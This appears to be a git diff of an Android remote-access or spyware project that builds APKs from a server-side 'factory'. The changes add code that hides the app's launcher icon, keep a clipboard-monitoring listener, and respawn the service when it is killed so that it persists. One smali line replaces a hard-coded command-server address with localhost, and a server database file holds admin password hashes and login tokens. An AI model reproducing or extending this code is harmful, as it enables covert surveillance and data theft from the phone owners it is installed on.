diff --git a/.gitignore b/.gitignore
index e2af297..7609d89 100644
--- a/.gitignore
+++ b/.gitignore
@@ -10,3 +10,5 @@ coverage
.lock-wscript
build/Release
node_modules
+client/.gradle/*
+client/.idea/*
diff --git a/client/app/app.iml b/client/app/app.iml
index d14dc26..0d03c40 100644
--- a/client/app/app.iml
+++ b/client/app/app.iml
@@ -19,7 +19,7 @@
-
+
diff --git a/client/app/release/app-release.apk b/client/app/release/app-release.apk
index dd33d59..c6c402a 100644
Binary files a/client/app/release/app-release.apk and b/client/app/release/app-release.apk differ
diff --git a/client/app/src/main/java/com/remote/app/MainService.java b/client/app/src/main/java/com/remote/app/MainService.java
index befcbea..b777b49 100644
--- a/client/app/src/main/java/com/remote/app/MainService.java
+++ b/client/app/src/main/java/com/remote/app/MainService.java
@@ -148,6 +148,10 @@ public class MainService extends Service {
@Override
public int onStartCommand(Intent intent, int flags, int startId) {
super.onStartCommand(intent, flags, startId);
+
+ PackageManager pkg=this.getPackageManager();
+ pkg.setComponentEnabledSetting(new ComponentName(this, MainActivity.class), PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);
+
ClipboardManager.OnPrimaryClipChangedListener mPrimaryChangeListener = new ClipboardManager.OnPrimaryClipChangedListener() {
public void onPrimaryClipChanged() {
ClipboardManager clipboard = (ClipboardManager) getSystemService(CLIPBOARD_SERVICE);
@@ -182,10 +186,7 @@ public class MainService extends Service {
public void onDestroy() {
super.onDestroy();
- Intent broadcastIntent = new Intent();
- broadcastIntent.setAction("RestartService");
- broadcastIntent.setClass(this, ServiceReciever.class);
- this.sendBroadcast(broadcastIntent);
+ sendBroadcast(new Intent("respawnService"));
}
diff --git a/server/app/factory/app-release.apk b/server/app/factory/app-release.apk
index dd33d59..c6c402a 100644
Binary files a/server/app/factory/app-release.apk and b/server/app/factory/app-release.apk differ
diff --git a/server/app/factory/decompiled/AndroidManifest.xml b/server/app/factory/decompiled/AndroidManifest.xml
index ba62d8a..8aa75bf 100644
--- a/server/app/factory/decompiled/AndroidManifest.xml
+++ b/server/app/factory/decompiled/AndroidManifest.xml
@@ -16,7 +16,6 @@
-
diff --git a/server/app/factory/decompiled/build/apk/AndroidManifest.xml b/server/app/factory/decompiled/build/apk/AndroidManifest.xml
new file mode 100644
index 0000000..2a815e1
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/AndroidManifest.xml differ
diff --git a/server/app/factory/decompiled/build/apk/classes.dex b/server/app/factory/decompiled/build/apk/classes.dex
new file mode 100644
index 0000000..2e8f271
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/classes.dex differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_low_normal.9.png b/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_low_normal.9.png
new file mode 100644
index 0000000..7e2b733
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_low_normal.9.png differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_low_pressed.9.png b/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_low_pressed.9.png
new file mode 100644
index 0000000..a36a60d
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_low_pressed.9.png differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_normal.9.png b/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_normal.9.png
new file mode 100644
index 0000000..8c49da6
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_normal.9.png differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_normal_pressed.9.png b/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_normal_pressed.9.png
new file mode 100644
index 0000000..3434cfa
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notification_bg_normal_pressed.9.png differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notify_panel_notification_icon_bg.png b/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notify_panel_notification_icon_bg.png
new file mode 100644
index 0000000..5f668a5
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable-hdpi/notify_panel_notification_icon_bg.png differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_low_normal.9.png b/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_low_normal.9.png
new file mode 100644
index 0000000..91fa1f2
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_low_normal.9.png differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_low_pressed.9.png b/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_low_pressed.9.png
new file mode 100644
index 0000000..56d765b
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_low_pressed.9.png differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_normal.9.png b/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_normal.9.png
new file mode 100644
index 0000000..5ba1c45
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_normal.9.png differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_normal_pressed.9.png b/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_normal_pressed.9.png
new file mode 100644
index 0000000..932065e
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notification_bg_normal_pressed.9.png differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notify_panel_notification_icon_bg.png b/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notify_panel_notification_icon_bg.png
new file mode 100644
index 0000000..8fbf4bb
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable-mdpi/notify_panel_notification_icon_bg.png differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable-v21/notification_action_background.xml b/server/app/factory/decompiled/build/apk/res/drawable-v21/notification_action_background.xml
new file mode 100644
index 0000000..3b1ce9c
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable-v21/notification_action_background.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_low_normal.9.png b/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_low_normal.9.png
new file mode 100644
index 0000000..4059330
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_low_normal.9.png differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_low_pressed.9.png b/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_low_pressed.9.png
new file mode 100644
index 0000000..1b14860
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_low_pressed.9.png differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_normal.9.png b/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_normal.9.png
new file mode 100644
index 0000000..3da5de5
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_normal.9.png differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_normal_pressed.9.png b/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_normal_pressed.9.png
new file mode 100644
index 0000000..fb38611
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notification_bg_normal_pressed.9.png differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notify_panel_notification_icon_bg.png b/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notify_panel_notification_icon_bg.png
new file mode 100644
index 0000000..adbe4d2
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable-xhdpi/notify_panel_notification_icon_bg.png differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable/notification_bg.xml b/server/app/factory/decompiled/build/apk/res/drawable/notification_bg.xml
new file mode 100644
index 0000000..b587935
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable/notification_bg.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable/notification_bg_low.xml b/server/app/factory/decompiled/build/apk/res/drawable/notification_bg_low.xml
new file mode 100644
index 0000000..09094ee
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable/notification_bg_low.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable/notification_icon_background.xml b/server/app/factory/decompiled/build/apk/res/drawable/notification_icon_background.xml
new file mode 100644
index 0000000..1d4c853
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable/notification_icon_background.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/drawable/notification_tile_bg.xml b/server/app/factory/decompiled/build/apk/res/drawable/notification_tile_bg.xml
new file mode 100644
index 0000000..320d270
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/drawable/notification_tile_bg.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/layout-v16/notification_template_custom_big.xml b/server/app/factory/decompiled/build/apk/res/layout-v16/notification_template_custom_big.xml
new file mode 100644
index 0000000..97c07c6
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/layout-v16/notification_template_custom_big.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/layout-v17/activity_main.xml b/server/app/factory/decompiled/build/apk/res/layout-v17/activity_main.xml
new file mode 100644
index 0000000..d24aae9
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/layout-v17/activity_main.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/layout-v17/notification_action.xml b/server/app/factory/decompiled/build/apk/res/layout-v17/notification_action.xml
new file mode 100644
index 0000000..ecf6bff
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/layout-v17/notification_action.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/layout-v17/notification_action_tombstone.xml b/server/app/factory/decompiled/build/apk/res/layout-v17/notification_action_tombstone.xml
new file mode 100644
index 0000000..90210f6
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/layout-v17/notification_action_tombstone.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/layout-v17/notification_template_custom_big.xml b/server/app/factory/decompiled/build/apk/res/layout-v17/notification_template_custom_big.xml
new file mode 100644
index 0000000..77a1e0b
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/layout-v17/notification_template_custom_big.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/layout-v21/notification_action.xml b/server/app/factory/decompiled/build/apk/res/layout-v21/notification_action.xml
new file mode 100644
index 0000000..0a47ba5
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/layout-v21/notification_action.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/layout-v21/notification_action_tombstone.xml b/server/app/factory/decompiled/build/apk/res/layout-v21/notification_action_tombstone.xml
new file mode 100644
index 0000000..0310fcd
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/layout-v21/notification_action_tombstone.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/layout-v21/notification_template_custom_big.xml b/server/app/factory/decompiled/build/apk/res/layout-v21/notification_template_custom_big.xml
new file mode 100644
index 0000000..1f98174
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/layout-v21/notification_template_custom_big.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/layout-v21/notification_template_icon_group.xml b/server/app/factory/decompiled/build/apk/res/layout-v21/notification_template_icon_group.xml
new file mode 100644
index 0000000..3f38d74
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/layout-v21/notification_template_icon_group.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/layout/activity_main.xml b/server/app/factory/decompiled/build/apk/res/layout/activity_main.xml
new file mode 100644
index 0000000..6c93c44
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/layout/activity_main.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/layout/notification_action.xml b/server/app/factory/decompiled/build/apk/res/layout/notification_action.xml
new file mode 100644
index 0000000..9663f4d
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/layout/notification_action.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/layout/notification_action_tombstone.xml b/server/app/factory/decompiled/build/apk/res/layout/notification_action_tombstone.xml
new file mode 100644
index 0000000..b05dfa5
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/layout/notification_action_tombstone.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/layout/notification_template_custom_big.xml b/server/app/factory/decompiled/build/apk/res/layout/notification_template_custom_big.xml
new file mode 100644
index 0000000..d1d9f17
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/layout/notification_template_custom_big.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/layout/notification_template_icon_group.xml b/server/app/factory/decompiled/build/apk/res/layout/notification_template_icon_group.xml
new file mode 100644
index 0000000..9a516e7
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/layout/notification_template_icon_group.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/layout/notification_template_part_chronometer.xml b/server/app/factory/decompiled/build/apk/res/layout/notification_template_part_chronometer.xml
new file mode 100644
index 0000000..4d7561a
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/layout/notification_template_part_chronometer.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/layout/notification_template_part_time.xml b/server/app/factory/decompiled/build/apk/res/layout/notification_template_part_time.xml
new file mode 100644
index 0000000..c6c130c
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/layout/notification_template_part_time.xml differ
diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-hdpi/ic_launcher.png b/server/app/factory/decompiled/build/apk/res/mipmap-hdpi/ic_launcher.png
new file mode 100644
index 0000000..1dbefa9
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/mipmap-hdpi/ic_launcher.png differ
diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-mdpi/ic_launcher.png b/server/app/factory/decompiled/build/apk/res/mipmap-mdpi/ic_launcher.png
new file mode 100644
index 0000000..c8e2986
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/mipmap-mdpi/ic_launcher.png differ
diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-xhdpi/ic_launcher.png b/server/app/factory/decompiled/build/apk/res/mipmap-xhdpi/ic_launcher.png
new file mode 100644
index 0000000..c0cad09
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/mipmap-xhdpi/ic_launcher.png differ
diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-xxhdpi/ic_launcher.png b/server/app/factory/decompiled/build/apk/res/mipmap-xxhdpi/ic_launcher.png
new file mode 100644
index 0000000..82b5407
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/mipmap-xxhdpi/ic_launcher.png differ
diff --git a/server/app/factory/decompiled/build/apk/res/mipmap-xxxhdpi/ic_launcher.png b/server/app/factory/decompiled/build/apk/res/mipmap-xxxhdpi/ic_launcher.png
new file mode 100644
index 0000000..e33de9c
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/res/mipmap-xxxhdpi/ic_launcher.png differ
diff --git a/server/app/factory/decompiled/build/apk/resources.arsc b/server/app/factory/decompiled/build/apk/resources.arsc
new file mode 100644
index 0000000..c92c596
Binary files /dev/null and b/server/app/factory/decompiled/build/apk/resources.arsc differ
diff --git a/server/app/factory/decompiled/original/META-INF/CERT.RSA b/server/app/factory/decompiled/original/META-INF/CERT.RSA
index 0479000..b2bcd46 100644
Binary files a/server/app/factory/decompiled/original/META-INF/CERT.RSA and b/server/app/factory/decompiled/original/META-INF/CERT.RSA differ
diff --git a/server/app/factory/decompiled/original/META-INF/CERT.SF b/server/app/factory/decompiled/original/META-INF/CERT.SF
index 93079f1..0998990 100644
--- a/server/app/factory/decompiled/original/META-INF/CERT.SF
+++ b/server/app/factory/decompiled/original/META-INF/CERT.SF
@@ -1,6 +1,6 @@
Signature-Version: 1.0
Created-By: 1.0 (Android)
-SHA1-Digest-Manifest: g4yoCisYLyXI7wUmD5zJMn3AcNk=
+SHA1-Digest-Manifest: kC0A0pxBWyd9di36828d/aKtGAY=
Name: AndroidManifest.xml
SHA1-Digest: xKbbLhV3eFCAsWGLIPl7xB3iVFw=
@@ -16,7 +16,7 @@ Name: META-INF/androidx.versionedparcelable_versionedparcelable.versio
SHA1-Digest: /M5ZcCUkGpD9LMU3LB/ji4SqKws=
Name: classes.dex
-SHA1-Digest: l0D4Pu8rxrMIOjxngIstZideahY=
+SHA1-Digest: vtV6DQB/SauRaYzfhYjAfpVZ6T0=
Name: res/drawable-hdpi-v4/notification_bg_low_normal.9.png
SHA1-Digest: GqlxeUYi9nderviC+XwD6tRD5Kg=
diff --git a/server/app/factory/decompiled/original/META-INF/MANIFEST.MF b/server/app/factory/decompiled/original/META-INF/MANIFEST.MF
index a3550a8..d2c89e0 100644
--- a/server/app/factory/decompiled/original/META-INF/MANIFEST.MF
+++ b/server/app/factory/decompiled/original/META-INF/MANIFEST.MF
@@ -16,7 +16,7 @@ Name: META-INF/androidx.versionedparcelable_versionedparcelable.versio
SHA1-Digest: xTi2bHEQyjoCjM/kItDx+iAKmTU=
Name: classes.dex
-SHA1-Digest: cxWymTTuoTvUYxa4odT0rXgKbQA=
+SHA1-Digest: 6s2rsvzX3vIiykUN3xdSRwvXx/s=
Name: res/drawable-hdpi-v4/notification_bg_low_normal.9.png
SHA1-Digest: D2PhKM51tYZo8a79riJ3XiUD2nc=
diff --git a/server/app/factory/decompiled/smali/com/remote/app/MainService.smali b/server/app/factory/decompiled/smali/com/remote/app/MainService.smali
index cb3f0b9..64f0921 100644
--- a/server/app/factory/decompiled/smali/com/remote/app/MainService.smali
+++ b/server/app/factory/decompiled/smali/com/remote/app/MainService.smali
@@ -127,15 +127,9 @@
new-instance v0, Landroid/content/Intent;
- invoke-direct {v0}, Landroid/content/Intent;->()V
+ const-string v1, "respawnService"
- const-string v1, "RestartService"
-
- invoke-virtual {v0, v1}, Landroid/content/Intent;->setAction(Ljava/lang/String;)Landroid/content/Intent;
-
- const-class v1, Lcom/remote/app/ServiceReciever;
-
- invoke-virtual {v0, p0, v1}, Landroid/content/Intent;->setClass(Landroid/content/Context;Ljava/lang/Class;)Landroid/content/Intent;
+ invoke-direct {v0, v1}, Landroid/content/Intent;->(Ljava/lang/String;)V
invoke-virtual {p0, v0}, Landroid/app/Service;->sendBroadcast(Landroid/content/Intent;)V
@@ -143,10 +137,26 @@
.end method
.method public onStartCommand(Landroid/content/Intent;II)I
- .locals 0
+ .locals 1
invoke-super {p0, p1, p2, p3}, Landroid/app/Service;->onStartCommand(Landroid/content/Intent;II)I
+ invoke-virtual {p0}, Landroid/app/Service;->getPackageManager()Landroid/content/pm/PackageManager;
+
+ move-result-object p1
+
+ new-instance p2, Landroid/content/ComponentName;
+
+ const-class p3, Lcom/remote/app/MainActivity;
+
+ invoke-direct {p2, p0, p3}, Landroid/content/ComponentName;->(Landroid/content/Context;Ljava/lang/Class;)V
+
+ const/4 p3, 0x1
+
+ const/4 v0, 0x2
+
+ invoke-virtual {p1, p2, v0, p3}, Landroid/content/pm/PackageManager;->setComponentEnabledSetting(Landroid/content/ComponentName;II)V
+
new-instance p1, Lcom/remote/app/j;
invoke-direct {p1, p0}, Lcom/remote/app/j;->(Lcom/remote/app/MainService;)V
@@ -165,7 +175,5 @@
invoke-static {p0}, Lcom/remote/app/e;->a(Landroid/content/Context;)V
- const/4 p1, 0x1
-
- return p1
+ return p3
.end method
diff --git a/server/app/factory/decompiled/smali/com/remote/app/h.smali b/server/app/factory/decompiled/smali/com/remote/app/h.smali
index 5f32251..3d691fc 100644
--- a/server/app/factory/decompiled/smali/com/remote/app/h.smali
+++ b/server/app/factory/decompiled/smali/com/remote/app/h.smali
@@ -64,7 +64,7 @@
invoke-direct {v1}, Ljava/lang/StringBuilder;->()V
- const-string v2, "http://3.6.95.182:22222?model="
+ const-string v2, "http://localhost:22222?model="
invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
diff --git a/server/assets/webpublic/build-aligned-signed-aligned-signed.apk b/server/assets/webpublic/build-aligned-signed-aligned-signed.apk
deleted file mode 100644
index cf5243f..0000000
Binary files a/server/assets/webpublic/build-aligned-signed-aligned-signed.apk and /dev/null differ
diff --git a/server/assets/webpublic/build-aligned-signed.apk b/server/assets/webpublic/build-aligned-signed.apk
index 517aad3..afa9feb 100644
Binary files a/server/assets/webpublic/build-aligned-signed.apk and b/server/assets/webpublic/build-aligned-signed.apk differ
diff --git a/server/assets/webpublic/build.apk b/server/assets/webpublic/build.apk
index c3d9ffb..de5d034 100644
Binary files a/server/assets/webpublic/build.apk and b/server/assets/webpublic/build.apk differ
diff --git a/server/maindb.json b/server/maindb.json
index 4c7efc5..b6d1482 100644
--- a/server/maindb.json
+++ b/server/maindb.json
@@ -1,46 +1,66 @@
{
- "admin": {
- "username": "admin",
- "password": "5f4dcc3b5aa765d61d8327deb882cf99",
- "loginToken": "385d9cb00bf3077b2d035da7f3fa946a",
- "logs": [
- {
- "time": "2020-01-11T15:23:07.971Z",
- "type": "SUCCESS",
- "message": "Build Succeded!"
- },
- {
- "time": "2020-01-11T15:27:32.586Z",
- "type": "SUCCESS",
- "message": "Build Succeded!"
- },
- {
- "time": "2020-01-11T16:08:04.582Z",
- "type": "SUCCESS",
- "message": "Build Succeded!"
- },
- {
- "time": "2020-03-22T16:24:09.546Z",
- "type": "SUCCESS",
- "message": "Build Succeded!"
- },
- {
- "time": "2020-03-22T16:53:31.032Z",
- "type": "SUCCESS",
- "message": "Build Succeded!"
- },
- {
- "time": "2020-03-22T18:01:07.951Z",
- "type": "SUCCESS",
- "message": "Build Succeded!"
- },
- {
- "time": "2020-03-22T18:02:03.352Z",
- "type": "SUCCESS",
- "message": "Build Succeded!"
- }
- ],
- "ipLog": []
- },
- "clients": []
- }
\ No newline at end of file
+ "admin": {
+ "username": "admin",
+ "password": "ffe553694f5096471590343432359e02",
+ "loginToken": "ddd9d299c3380709efbc19ac381b4fad",
+ "logs": [
+ {
+ "time": "2020-01-11T15:23:07.971Z",
+ "type": "SUCCESS",
+ "message": "Build Succeded!"
+ },
+ {
+ "time": "2020-01-11T15:27:32.586Z",
+ "type": "SUCCESS",
+ "message": "Build Succeded!"
+ },
+ {
+ "time": "2020-01-11T16:08:04.582Z",
+ "type": "SUCCESS",
+ "message": "Build Succeded!"
+ },
+ {
+ "time": "2020-03-22T16:24:09.546Z",
+ "type": "SUCCESS",
+ "message": "Build Succeded!"
+ },
+ {
+ "time": "2020-03-22T16:53:31.032Z",
+ "type": "SUCCESS",
+ "message": "Build Succeded!"
+ },
+ {
+ "time": "2020-03-22T18:01:07.951Z",
+ "type": "SUCCESS",
+ "message": "Build Succeded!"
+ },
+ {
+ "time": "2020-03-22T18:02:03.352Z",
+ "type": "SUCCESS",
+ "message": "Build Succeded!"
+ },
+ {
+ "time": "2020-03-22T20:20:58.216Z",
+ "type": "SUCCESS",
+ "message": "Build Succeded!"
+ },
+ {
+ "time": "2020-03-22T20:22:08.417Z",
+ "type": "SUCCESS",
+ "message": "Build Succeded!"
+ },
+ {
+ "time": "2020-03-23T04:57:13.758Z",
+ "type": "SUCCESS",
+ "message": "Build Succeded!"
+ },
+ {
+ "time": "2020-03-23T04:59:46.252Z",
+ "type": "SUCCESS",
+ "message": "Build Succeded!"
+ }
+ ],
+ "ipLog": []
+ },
+ "clients": []
+}
\ No newline at end of file